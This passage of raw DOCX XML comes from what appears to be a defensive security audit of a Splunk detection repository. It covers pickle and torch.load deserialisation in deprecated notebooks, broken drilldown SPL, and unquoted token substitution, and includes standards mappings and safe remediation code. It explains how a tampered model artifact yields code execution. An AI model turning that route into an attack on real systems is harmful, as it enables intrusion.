      </w:r>
      <w:r>
        <w:t xml:space="preserve"> whose value is not a time token). Adopting the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>|s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> modifier repo-wide (currently 1/1,971) closes the systemic gap.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-74 Improper Neutralization of Special Elements in Output Used by a Downstream Component (Injection); CWE-77 Improper Neutralization of Special Elements used in a Command (Command Injection) (2024 CWE Top 25 #13); CWE-116 Improper Encoding or Escaping of Output. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A03:2021 Injection. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> T1562.001 Impair Defenses: Disable or Modify Tools. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SI-10 Information Input Validation. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PR.PS Protect - Platform Security. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.28 Secure coding. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Detection content / Output Encoding.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>DET-16 — DSDL/MLTK notebooks deserialise models with pickle and torch.load on stale libraries</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Low (CVSS v3.1 base 3.9). Exploitability: Conditionally exploitable (supply chain of model artifacts).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> deprecated/notebooks/pretrained_dga_model_dsdl.ipynb (cell 17); detect_suspicious_dns_txt_records_using_pretrained_model_in_dsdl.ipynb (cells 18,24); detect_dns_data_exfiltration_using_pretrained_model_in_dsdl.ipynb (cells 12,22); detect_suspicious_processnames_using_pretrained_model_in_dsdl.ipynb (cells 17,28)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: These MLTK/DSDL notebooks deserialize model artifacts via </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>pickle.load</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>torch.load</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>tf.keras.models.load_model</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> from a fixed container path </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>/srv/app/model/data/...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>pickle</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>torch.load</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (which uses pickle) execute arbitrary code on load; if an attacker can write the model directory (supply-chain of the pretrained </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.pt</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.pkl</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, or a writable DSDL container volume) they achieve code execution in the DSDL container. In the shipped context the model files are trusted artifacts and the notebooks are </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>deprecated/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (not in the ESCU app build), so this is a latent/supply-chain concern, not a live vuln. No hard-coded tokens/passwords or embedded output data containing secrets were found in any cell. No </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>eval</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>exec</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>shell=True</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>os.system</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>subprocess</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>requests(verify=False)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> present (the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.eval()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> hits are </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>torch.nn.Module.eval()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, benign). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Untrusted-input reachability</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Requires attacker write to the model artifact / container volume. Verdict: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Conditionally exploitable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (CWE-502 supply-chain), low because artifacts are trusted and notebooks are deprecated. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Prefer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>torch.load(..., weights_only=True)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (PyTorch ≥2.0) and load the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>state_dict</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> only; avoid </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>pickle</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> for vocab/tokenizer — ship as JSON; verify artifact integrity (hash/signature) before load; pin and refresh dependencies (the pinned versions have known CVEs); use HTTPS for HEC. Example:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>state = torch.load(MODEL_DIRECTORY + "model.pt", map_location="cpu", weights_only=True)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>model.load_state_dict(state); model.eval()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t># vocab:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>import json; vocab = json.load(open(MODEL_DIRECTORY + "vocab.json"))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-502 Deserialization of Untrusted Data (2024 CWE Top 25 #16); CWE-494 Download of Code Without Integrity Check; CWE-1104 Use of Unmaintained Third Party Components. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A08:2021 Software and Data Integrity Failures, A06:2021 Vulnerable and Outdated Components. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> T1195 Supply Chain Compromise, T1204.002 User Execution: Malicious File. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SI-7 Software, Firmware, and Information Integrity, SR-11 Component Authenticity. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PR.PS Protect - Platform Security. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.28 Secure coding, A.8.29 Security testing in development and acceptance. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Detection content / Input Validation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>DET-08 — Malformed drilldown SPL in Copilot and Ollama detections (unbalanced quotes)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Low (CVSS v3.1 base 3.1). Exploitability: Not exploitable (quality).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> detections/application/m365_copilot_non_compliant_devices_accessing_m365_copilot.yml:26; m365_copilot_information_extraction_jailbreak_attack.yml:63; m365_copilot_jailbreak_attempts.yml:37; ollama_abnormal_network_connectivity.yml:29 (+5 ollama files)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: These drilldowns contain a stray leading quote and a malformed field expression — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>| search  "$user = "$user$"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (note the leading </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>$user</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> without closing </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). The rendered drilldown is syntactically broken SPL; the pivot will error or return nothing, and one even has a typo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>$Suser</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. This is a quality/defense-in-depth defect: the primary detection still fires, but the analyst drilldown is dead. (These are also the 25 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>a_unbalanced_quotes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> hits that are genuine, versus the ~false-positive hits from escaped </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>\\</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> regex which I confirmed benign, e.g. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>detect_baron_samedit_cve_2021_3156.yml:11</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Untrusted-input reachability</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Not attacker-reachable; broken analyst UX. Verdict: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Not exploitable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (quality defect). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Fix to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>| search user=$user|s$</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>src=$src|s$</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>host=$host|s$</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), removing the stray quote and using the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>|s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> modifier (also fixes DET-05 for these). Add a contentctl lint that compiles drilldown SPL / checks </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-delimiter balance (the schema already validates balance for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>EsTokenString</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> risk messages but evidently not for drilldown </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>search</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-628; CWE-1078. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A09:2021 Security Logging and Monitoring Failures. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SI-4 System Monitoring. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DE.CM Detect - Continuous Monitoring. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.16 Monitoring activities. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Detection content / General Coding Practices.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>DET-12 — map subsearches with non-attacker-controlled $token$ substitution (defence-in-depth)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Low (CVSS v3.1 base 2.6). Exploitability: Not exploitable (defence-in-depth).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> detections/endpoint/windows_ad_domain_controller_promotion.yml:19; windows_ad_replication_request_initiated_by_user_account.yml:20; windows_ad_replication_request_initiated_from_unsanctioned_location.yml:23; windows_ad_short_lived_domain_controller_spn_attribute.yml:22; windows_ad_suspicious_attribute_modification.yml:17; detections/application/splunk_rce_through_arbitrary_file_write_to_windows_system_root.yml:21</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
        <w:t>: Same unquoted-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>map</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-substitution mechanism as DET-02, but the substituted tokens here are </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>TargetLogonId</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (a numeric Windows logon id), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>_time</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-derived values, and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>_internal</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — not freely attacker-chosen strings, so practical injection is implausible. Still, the tokens are not </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>|s</w:t>
      </w:r>
      <w:r>
        <w:t>-quoted; flagged as defense-in-depth consistency with the DET-02/DET-05 remediation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Verdict</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Not exploitable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (defense-in-depth). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: apply </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>$TargetLogonId|s$</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>$api_user|s$</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> quoting for uniformity; prefer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>join</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>stats</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> over </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>map</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-116 Improper Encoding or Escaping of Output. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A03:2021 Injection. </w:t>
      </w:r>
      <w:r>
